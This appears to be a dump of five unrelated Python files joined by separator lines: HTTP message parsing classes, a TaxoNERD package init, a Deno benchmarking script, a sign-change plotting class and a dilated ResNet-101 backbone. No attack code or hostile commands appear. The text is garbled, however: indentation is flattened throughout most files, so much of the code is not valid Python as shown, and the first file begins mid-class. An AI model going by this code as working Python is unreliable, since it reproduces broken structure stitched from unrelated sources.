""" Abstract class for functionality shared
between Request and Response.
"""
@staticmethod
def read_headers_from(lines):
""" Reads and parses a block of headers from an iterable of lines.
Returns dict mapping header names (str) to values (str).
Raises ParseError on parsing error.
"""
headers = dict()
last_header = None
while True:
# Get the next line
headerLine = next(lines)
# Stop at end of headers
if len(headerLine.strip()) == 0: return headers
if headerLine.startswith(' ') or headerLine.startswith('\t'):
# Merge continuation lines with the current header's value
                if last_header is None: raise ParseError()
headers[last_header] += ' ' + headerLine.strip()
else:
# Separate header into name and value
parts = headerLine.split(':', 1)
                if len(parts) != 2: raise ParseError()
last_header, value = parts
if last_header in headers:
# Merge values of duplicate headers
headers[last_header] += ',' + value.strip()
else:
# Create an entirely new header
headers[last_header] = value.strip()
def __init__(self, ver=None, headers=None, body=None):
""" Initialize data shared between request and response.
ver: HTTPVersion -- HTTPVersion specified by response;
defaults to HTTP/1.1
headers: dict -- headers of the response; defaults to empty dict
body: bytes -- body content of the response; defaults to empty
"""
assert ver is None or isinstance(ver, HTTPVersion)
assert headers is None or isinstance(headers, dict)
assert body is None or isinstance(body, bytes)
self.ver = ver or HTTPVersion(1, 1)
self.headers = headers or dict()
self.body = body or b''
def attach_header(self, header, value):
""" Attach a header to an existing request.
header: str -- header name
value: str -- header value
If the header already exists, it will be merged with the new value.
"""
if header in self.headers.keys():
self.headers[header] += ', ' + value
else:
self.headers[header] = value
def _message_line(self):
""" Generates the "message line": the first line of the message.
Must be implemented by concrete subclasses.
"""
raise NotImplementedError()
def __bytes__(self):
return (bytes(self._message_line() + '\r\n'
+ '\r\n'.join('{}: {}'.format(k, v)
for k, v in self.headers.items())
+ '\r\n\r\n', encoding='ascii')
+ self.body)
def __str__(self):
return (self._message_line() + '\n'
+ '\n'.join('{}: {}'.format(k, v)
for k, v in self.headers.items())
+ '\n\n'
+ str(self.body))
class Request(Message):
""" An HTTP request. """
@staticmethod
def read_from(lines):
""" Reads and parses a request message from an iterable of lines.
Returns a Request object.
Raises ParseError if the request cannot be parsed.
If the version is not HTTP/1.1, the headers will not be
parsed, since their format is not known.
Request bodies will be ignored.
"""
# Read and parse the request line
method, path, version = Request._read_reqline(lines)
# Stop early if the version is unsupported
        if version != HTTPVersion(1, 1): return Request(method, path, version)
# Read and parse the headers
headers = Message.read_headers_from(lines)
# Build a Request object
return Request(method, path, version, headers=headers)
@staticmethod
def _read_reqline(lines):
""" Reads and parses a request line (the first line of a request)
from an iterable of lines.
Empty lines before the request line will be consumed.
Returns (method: str, path: str, ver: HTTPVersion)
Raises ParseError if the request line cannot be parsed.
"""
# Get the first non-blank line
requestLine = ''
while not requestLine:
requestLine = next(lines)
# Split into url, path, http version
parts = requestLine.split(' ')
        if len(parts) != 3: raise ParseError()
method, path, ver_string = parts
# Parse the http version
ver = HTTPVersion.parse(ver_string)
return method, path, ver
def __init__(self, method, path, ver=None, headers=None, body=None):
""" Create an HTTP request.
method: str -- HTTP method
path: str -- request path
ver: HTTPVersion -- HTTP version specified by request;
defaults to HTTP/1.1
headers: dict -- headers of the request; defaults to empty dict
body: str -- body content of the response; defaults to empty str
"""
assert isinstance(method, str)
assert isinstance(path, str)
super().__init__(ver, headers, body)
self.method = method
self.path = path
def _message_line(self):
return '{} {} {}'.format(self.method, self.path, self.ver)
class Response(Message):
""" An HTTP response. """
OK = 200
MOVED_PERMANENTLY = 301
BAD_REQUEST = 400
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
INTERNAL_SERVER_ERROR = 500
VERSION_NOT_SUPPORTED = 505
STATUS_MESSAGES = {
OK: 'OK',
MOVED_PERMANENTLY: 'Moved Permanently',
BAD_REQUEST: 'Bad Request',
NOT_FOUND: 'Not Found',
METHOD_NOT_ALLOWED: 'Method Not Allowed',
INTERNAL_SERVER_ERROR: 'Internal Server Error',
VERSION_NOT_SUPPORTED: 'HTTP Version Not Supported'
}
def __init__(self, code, ver=None, headers=None, body=None):
""" Create an HTTP response.
code: int -- status code
ver: HTTPVersion -- HTTPVersion specified by response;
defaults to HTTP/1.1
headers: dict -- headers of the response; defaults to empty dict
body: str -- body content of the response; defaults to empty str
"""
assert isinstance(code, int)
super().__init__(ver, headers, body)
self.code = code
def status_message(self):
return self.STATUS_MESSAGES[self.code]
def _message_line(self):
return '{} {} {}'.format(self.ver, self.code, self.status_message())
def guess_content_type(filename):
""" Return a content-type for a filename based on its suffix.
This implementation only supports '.html' and '.css' as suffixes.
"""
if filename.endswith('.html'):
return 'text/html'
elif filename.endswith('.css'):
return 'text/css'
else:
return 'text/plain'
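# A small illustrative round trip (not part of the original module): build a
# Response, attach headers with attach_header(), and serialize it with bytes().
# The body and header values below are made-up examples.
if __name__ == '__main__':
    body = b'<html><body>Hello</body></html>'
    response = Response(Response.OK, body=body)
    response.attach_header('Content-Type', guess_content_type('index.html'))
    response.attach_header('Content-Length', str(len(body)))
    print(bytes(response))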
|
from .taxonerd import TaxoNERD
from .cli import *
__version__ = "1.3.0"
|
#!/usr/bin/env python
# Copyright 2018-2020 the Deno authors. All rights reserved. MIT license.
# Performs benchmark and append data to //website/data.json.
# If //website/data.json doesn't exist, this script tries to import it from
# gh-pages branch.
# To view the results locally run ./tools/http_server.py and visit
# http://localhost:4545/website
import os
import sys
import json
import time
import tempfile
import subprocess
from util import build_path, executable_suffix, root_path, run, run_output
import third_party
from http_benchmark import http_benchmark
import throughput_benchmark
import http_server
# The list of the tuples of the benchmark name and arguments
exec_time_benchmarks = [
("hello", ["cli/tests/002_hello.ts"]),
("relative_import", ["cli/tests/003_relative_import.ts"]),
("error_001", ["cli/tests/error_001.ts"]),
("cold_hello", ["--reload", "cli/tests/002_hello.ts"]),
("cold_relative_import", ["--reload", "cli/tests/003_relative_import.ts"]),
("workers_startup", ["cli/tests/workers_startup_bench.ts"]),
("workers_round_robin", ["cli/tests/workers_round_robin_bench.ts"]),
("text_decoder", ["cli/tests/text_decoder_perf.js"]),
("text_encoder", ["cli/tests/text_encoder_perf.js"]),
]
def read_json(filename):
with open(filename) as json_file:
return json.load(json_file)
def write_json(filename, data):
with open(filename, 'w') as outfile:
json.dump(data, outfile)
def get_binary_sizes(build_dir):
sizes = {}
mtimes = {}
# The deno executable should be located at the root of the build tree.
deno_exe = os.path.join(build_dir, "deno" + executable_suffix)
sizes["deno"] = os.path.getsize(deno_exe)
# Because cargo's OUT_DIR is not predictable, search the build tree for
# snapshot related files.
for parent_dir, _, file_names in os.walk(build_dir):
for file_name in file_names:
if not file_name in [
"CLI_SNAPSHOT.bin",
"CLI_SNAPSHOT.js",
"CLI_SNAPSHOT.js.map",
"COMPILER_SNAPSHOT.bin",
"COMPILER_SNAPSHOT.js",
"COMPILER_SNAPSHOT.js.map",
]:
continue
file_path = os.path.join(parent_dir, file_name)
file_mtime = os.path.getmtime(file_path)
# If multiple copies of a file are found, use the most recent one.
if file_name in mtimes and mtimes[file_name] > file_mtime:
continue
mtimes[file_name] = file_mtime
sizes[file_name] = os.path.getsize(file_path)
return sizes
def get_strace_summary_text(test_args):
f = tempfile.NamedTemporaryFile()
cmd = ["strace", "-c", "-f", "-o", f.name] + test_args
try:
subprocess.check_output(cmd)
except subprocess.CalledProcessError:
pass
return f.read()
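# For reference (added comment, not in the original script): "strace -c" emits
# a summary table shaped roughly like the following, which is what
# strace_parse() below expects -- a header row, a dashed separator, one row per
# syscall, another dashed separator and a final "total" row:
#
#   % time     seconds  usecs/call     calls    errors syscall
#   ------ ----------- ----------- --------- --------- ----------------
#    34.00    0.000340           5        64           mmap
#   ...
#   ------ ----------- ----------- --------- --------- ----------------
#   100.00    0.001000                   500        12 total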
def strace_parse(summary_text):
summary = {}
# clear empty lines
lines = list(filter(lambda x: x and x != "\n", summary_text.split("\n")))
# Filter out non-relevant lines. See the error log at
# https://github.com/denoland/deno/pull/3715/checks?check_run_id=397365887
# This is checked in tools/testdata/strace_summary2.out
lines = [x for x in lines if x.find("detached ...") == -1]
if len(lines) < 4:
return {} # malformed summary
lines, total_line = lines[2:-2], lines[-1]
# data to dict for each line
for line in lines:
syscall_fields = line.split()
syscall_name = syscall_fields[-1]
syscall_dict = {}
if 5 <= len(syscall_fields) <= 6:
syscall_dict = {
"% time": float(syscall_fields[0]),
"seconds": float(syscall_fields[1]),
"usecs/call": int(syscall_fields[2]),
"calls": int(syscall_fields[3])
}
syscall_dict["errors"] = 0 if len(syscall_fields) < 6 else int(
syscall_fields[4])
summary[syscall_name] = syscall_dict
# record overall (total) data
total_fields = total_line.split()
summary["total"] = {
"% time": float(total_fields[0]),
"seconds": float(total_fields[1]),
"calls": int(total_fields[2]),
"errors": int(total_fields[3])
}
return summary
def get_strace_summary(test_args):
s = get_strace_summary_text(test_args)
try:
return strace_parse(s)
except ValueError:
print "error parsing strace"
print "----- <strace> -------"
print s
print "----- </strace> ------"
def run_throughput(deno_exe):
m = {}
m["100M_tcp"] = throughput_benchmark.tcp(deno_exe, 100)
m["100M_cat"] = throughput_benchmark.cat(deno_exe, 100)
m["10M_tcp"] = throughput_benchmark.tcp(deno_exe, 10)
m["10M_cat"] = throughput_benchmark.cat(deno_exe, 10)
return m
# "thread_count" and "syscall_count" are both calculated here.
def run_strace_benchmarks(deno_exe, new_data):
thread_count = {}
syscall_count = {}
for (name, args) in exec_time_benchmarks:
s = get_strace_summary([deno_exe] + args)
thread_count[name] = s["clone"]["calls"] + 1
syscall_count[name] = s["total"]["calls"]
new_data["thread_count"] = thread_count
new_data["syscall_count"] = syscall_count
# Takes the output from "/usr/bin/time -v" as input and extracts the 'maximum
# resident set size' and returns it in bytes.
def find_max_mem_in_bytes(time_v_output):
for line in time_v_output.split('\n'):
if 'maximum resident set size (kbytes)' in line.lower():
_, value = line.split(': ')
return int(value) * 1024
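# For reference (added comment, not in the original script): "/usr/bin/time -v"
# prints, among other lines, something like
#
#   Maximum resident set size (kbytes): 52004
#
# which find_max_mem_in_bytes() turns into 52004 * 1024 bytes.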
def run_max_mem_benchmark(deno_exe):
results = {}
for (name, args) in exec_time_benchmarks:
cmd = ["/usr/bin/time", "-v", deno_exe] + args
try:
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as e:
            # "/usr/bin/time -v" still prints its summary when the command
            # exits non-zero; use the output captured by the exception so
            # `out` is never left unbound.
            out = e.output
mem = find_max_mem_in_bytes(out)
results[name] = mem
return results
def run_exec_time(deno_exe, build_dir):
hyperfine_exe = third_party.get_prebuilt_tool_path("hyperfine")
benchmark_file = os.path.join(build_dir, "hyperfine_results.json")
run([
hyperfine_exe, "--ignore-failure", "--export-json", benchmark_file,
"--warmup", "3"
] + [
deno_exe + " " + " ".join(args) for [_, args] in exec_time_benchmarks
])
hyperfine_results = read_json(benchmark_file)
results = {}
for [[name, _], data] in zip(exec_time_benchmarks,
hyperfine_results["results"]):
results[name] = {
"mean": data["mean"],
"stddev": data["stddev"],
"user": data["user"],
"system": data["system"],
"min": data["min"],
"max": data["max"]
}
return results
def run_http(build_dir, new_data):
stats = http_benchmark(build_dir)
new_data["req_per_sec"] = {k: v["req_per_sec"] for k, v in stats.items()}
new_data["max_latency"] = {k: v["max_latency"] for k, v in stats.items()}
def bundle_benchmark(deno_exe):
bundles = {
"file_server": "./std/http/file_server.ts",
"gist": "./std/examples/gist.ts",
}
sizes = {}
for name, url in bundles.items():
# bundle
path = name + ".bundle.js"
run([deno_exe, "bundle", url, path])
# get size of bundle
assert os.path.exists(path)
sizes[name] = os.path.getsize(path)
# remove bundle
os.remove(path)
return sizes
def main():
build_dir = build_path()
sha1 = run_output(["git", "rev-parse", "HEAD"],
exit_on_fail=True).out.strip()
http_server.spawn()
deno_exe = os.path.join(build_dir, "deno")
os.chdir(root_path)
new_data = {
"created_at": time.strftime("%Y-%m-%dT%H:%M:%SZ"),
"sha1": sha1,
}
# TODO(ry) The "benchmark" benchmark should actually be called "exec_time".
# When this is changed, the historical data in gh-pages branch needs to be
# changed too.
new_data["benchmark"] = run_exec_time(deno_exe, build_dir)
new_data["binary_size"] = get_binary_sizes(build_dir)
new_data["bundle_size"] = bundle_benchmark(deno_exe)
# Cannot run throughput benchmark on windows because they don't have nc or
# pipe.
if os.name != 'nt':
new_data["throughput"] = run_throughput(deno_exe)
run_http(build_dir, new_data)
if "linux" in sys.platform:
run_strace_benchmarks(deno_exe, new_data)
new_data["max_memory"] = run_max_mem_benchmark(deno_exe)
print "===== <BENCHMARK RESULTS>"
print json.dumps(new_data, indent=2)
print "===== </BENCHMARK RESULTS>"
write_json(os.path.join(build_dir, "bench.json"), new_data)
if __name__ == '__main__':
main()
|
import matplotlib.pyplot as plt
class SignChangeSparseMap:
def __init__(self):
self.x_plus = []
self.x_minus = []
self.y_plus = []
self.y_minus = []
def add_right_change(self, x, y):
self.x_plus.append([x, y])
def add_left_change(self, x, y):
self.x_minus.append([x, y])
def add_up_change(self, x, y):
self.y_plus.append([x, y])
def add_down_change(self, x, y):
self.y_minus.append([x, y])
def to_dict(self):
return {
'__sign_change_sparse_map__': True,
'x_plus': self.x_plus,
'x_minus': self.x_minus,
'y_plus': self.y_plus,
'y_minus': self.y_minus,
}
@staticmethod
    def from_dict(data):
        if '__sign_change_sparse_map__' not in data:
            raise RuntimeError('not a SignChangeSparseMap dict')
        restored_sparse_map = SignChangeSparseMap()
        restored_sparse_map.x_plus = data['x_plus']
        restored_sparse_map.x_minus = data['x_minus']
        restored_sparse_map.y_plus = data['y_plus']
        restored_sparse_map.y_minus = data['y_minus']
        return restored_sparse_map
def plot(self, save_path=""):
[xs, ys] = [[i for i, j in self.x_plus], [j for i, j in self.x_plus]]
plt.plot(xs, ys, 'y.')
[xs, ys] = [[i for i, j in self.x_minus], [j for i, j in self.x_minus]]
plt.plot(xs, ys, 'r.')
[xs, ys] = [[i for i, j in self.y_plus], [j for i, j in self.y_plus]]
plt.plot(xs, ys, 'g.')
[xs, ys] = [[i for i, j in self.y_minus], [j for i, j in self.y_minus]]
plt.plot(xs, ys, 'b.')
plt.xlabel('x')
plt.ylabel('y')
if save_path:
plt.savefig(save_path)
else:
plt.show()
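# A minimal round-trip sketch added for illustration (not part of the original
# module); the coordinates are made up. to_dict()/from_dict() are shaped so a
# map survives JSON serialization.
if __name__ == '__main__':
    import json
    sparse_map = SignChangeSparseMap()
    sparse_map.add_right_change(1.0, 2.0)
    sparse_map.add_up_change(3.0, 4.0)
    restored = SignChangeSparseMap.from_dict(
        json.loads(json.dumps(sparse_map.to_dict())))
    print(restored.x_plus, restored.y_plus)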
|
# -*- coding: utf-8 -*-
"""
@Time : 2019/3/3 19:55
@Author : Wang Xin
@Email : wangxin_buaa@163.com
"""
import torch
import torch.nn as nn
from torch.nn import BatchNorm2d
import torchvision.models.resnet
affine_par = True
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, fist_dilation=1, multi_grid=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=dilation * multi_grid, dilation=dilation * multi_grid, bias=False)
self.bn2 = BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=False)
self.relu_inplace = nn.ReLU(inplace=True)
self.downsample = downsample
self.dilation = dilation
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out = out + residual
out = self.relu_inplace(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers):
self.inplanes = 128
super(ResNet, self).__init__()
self.conv1 = conv3x3(3, 64, stride=2)
self.bn1 = BatchNorm2d(64)
self.relu1 = nn.ReLU(inplace=False)
self.conv2 = conv3x3(64, 64)
self.bn2 = BatchNorm2d(64)
self.relu2 = nn.ReLU(inplace=False)
self.conv3 = conv3x3(64, 128)
self.bn3 = BatchNorm2d(128)
self.relu3 = nn.ReLU(inplace=False)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.relu = nn.ReLU(inplace=False)
# self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1, ceil_mode=True) # change
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4, multi_grid=(1, 1, 1))
def _make_layer(self, block, planes, blocks, stride=1, dilation=1, multi_grid=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
BatchNorm2d(planes * block.expansion, affine=affine_par))
layers = []
generate_multi_grid = lambda index, grids: grids[index % len(grids)] if isinstance(grids, tuple) else 1
layers.append(block(self.inplanes, planes, stride, dilation=dilation, downsample=downsample,
multi_grid=generate_multi_grid(0, multi_grid)))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(
block(self.inplanes, planes, dilation=dilation, multi_grid=generate_multi_grid(i, multi_grid)))
return nn.Sequential(*layers)
def forward(self, x):
x = self.relu1(self.bn1(self.conv1(x)))
x = self.relu2(self.bn2(self.conv2(x)))
x = self.relu3(self.bn3(self.conv3(x)))
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def freeze(self):
for m in self.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
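# Note added for clarity (not in the original source): conv1, maxpool and
# layer2 each halve the spatial resolution, while layer3/layer4 keep stride 1
# and use dilation instead, so the backbone has an overall output stride of 8.
# An HxW input therefore yields roughly H/8 x W/8 feature maps with
# 512 * Bottleneck.expansion = 2048 channels.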
def resnet101(pretrained=True):
resnet101 = ResNet(Bottleneck, [3, 4, 23, 3])
if pretrained:
# saved_state_dict = torch.load('./network/pretrained_models/resnet101-imagenet.pth')
saved_state_dict = torch.load('/home/dahai/hackthon/DORN_pytorch/pretrained_models/resnet101-imagenet.pth')
new_params = resnet101.state_dict().copy()
for i in saved_state_dict:
i_parts = i.split('.')
if not i_parts[0] == 'fc':
new_params['.'.join(i_parts[0:])] = saved_state_dict[i]
resnet101.load_state_dict(new_params)
print(
"++++++++++++++++++++++++++++++++ Pre-trained Model Loaded ++++++++++++++++++++++++++++++++++++++")
return resnet101
if __name__ == "__main__":
model = resnet101(pretrained=True)
model = model.cuda()
model.eval()
image = torch.randn(1, 3, 720, 1280)
image = image.cuda()
with torch.no_grad():
        # forward() returns a single feature map, not a tuple
        out = model(image)
    print('out size:', out.size())
|